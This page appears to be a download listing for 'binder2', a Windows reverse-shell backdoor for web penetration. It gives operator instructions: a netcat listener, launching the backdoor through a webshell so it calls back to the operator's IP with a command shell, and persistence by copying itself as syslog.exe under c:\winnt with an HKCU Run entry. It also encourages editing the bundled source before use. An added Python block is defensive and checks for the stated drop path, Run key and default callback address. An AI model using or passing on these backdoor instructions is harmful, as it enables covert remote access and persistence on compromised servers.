File name: binder2
Description -- all downloads come from the Internet; study and use them at your own discretion
Summary:
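In web penetration testing we often find that the host's ports are filtered: a backdoor is created successfully but cannot be connected to. In that situation this reverse-connecting backdoor may be of some use.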
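Usage:
1. Listen on a port on the local machine:
netcat -vv -l -p 80
2. Run the backdoor through a webshell or by some other means:
binder2 80 youIPadd
3. The local listening port will receive a cmd from the remote host.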
Note:
The program creates an autostart entry for itself. If it is run without arguments, it connects to the default IP and default port; the default IP address in this exe is the internal address 10.24.9.100, port 7358.
The program copies itself to c:\winnt\ under the name syslog.exe and creates a startup value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. To uninstall, use the binder2 /kill command. (If permissions are insufficient, for example when it is run from a webshell, these steps cannot be carried out.)
The archive includes the source code; modifying the code as needed before use is recommended.
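A defender-side check for the artifacts listed in the note above, added here as an example and not part of the binder2 archive or of this page's original text: it scans `reg query`-style output and connection records for the stated drop path, Run key and default peer. The sample data and value names are constructed, and %SystemRoot% is assumed to resolve to c:\winnt; because the source ships with the archive, a rebuilt binary can carry different defaults.

```python
import ntpath
import re

# Indicators this page states for the unmodified binary.
DROP_PATH = r"c:\winnt\syslog.exe"
DEFAULT_PEER = ("10.24.9.100", 7358)
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample in `reg query` layout; the value names are made up.
SAMPLE_REG = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon    REG_SZ    C:\WINNT\system32\ctfmon.exe
    logsvc    REG_SZ    "C:\WINNT\SysLog.exe"
    updater    REG_EXPAND_SZ    %SystemRoot%\syslog.exe /quiet
"""
# Constructed connection records: (process image, remote IP, remote port).
SAMPLE_CONNS = [
    (r"C:\WINNT\system32\svchost.exe", "192.0.2.10", 443),
    (r"C:\WINNT\syslog.exe", "198.51.100.7", 80),
    (r"C:\Inetpub\scripts\binder2.exe", "10.24.9.100", 7358),
]

def image_path(data, system_root=r"c:\winnt"):
    """Normalised executable path from a Run value's data or an image name."""
    data = data.strip()
    if data.startswith('"'):                      # quoted path, maybe with args
        exe = data[1:].split('"', 1)[0]
    else:                                         # bare path: cut at first .exe
        m = re.match(r"(.+?\.exe)\b", data, re.I)
        exe = m.group(1) if m else data
    exe = re.sub(r"%(systemroot|windir)%", lambda _: system_root, exe, flags=re.I)
    return ntpath.normpath(exe).lower()

def parse_reg_query(text):
    """Yield (key, value_name, data) tuples from `reg query`-style text."""
    key = None
    for line in text.splitlines():
        m = re.match(r"\s+(.+?)\s+(REG_\w+)\s+(.*)", line)
        if m and key:
            yield key, m.group(1), m.group(3)
        elif line.strip() and not line[0].isspace():
            key = line.strip()

def run_key_hits(reg_text):
    """Value names under the HKCU Run key that launch the drop path."""
    return [name for key, name, data in parse_reg_query(reg_text)
            if key.lower() == RUN_KEY.lower() and image_path(data) == DROP_PATH]

def connection_hits(conns):
    """Records to the default peer, or made by the dropped copy to any peer."""
    return [c for c in conns
            if (c[1], c[2]) == DEFAULT_PEER or image_path(c[0]) == DROP_PATH]
```

The Run key is per-user (HKEY_CURRENT_USER), so the registry export has to be taken for each user profile on the host, including the account the web server runs as.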
(Generated automatically by the system; the contents can be reviewed before downloading)
Download file list
binder2
.......\binder2.c
.......\binder2.exe
.......\readme.txt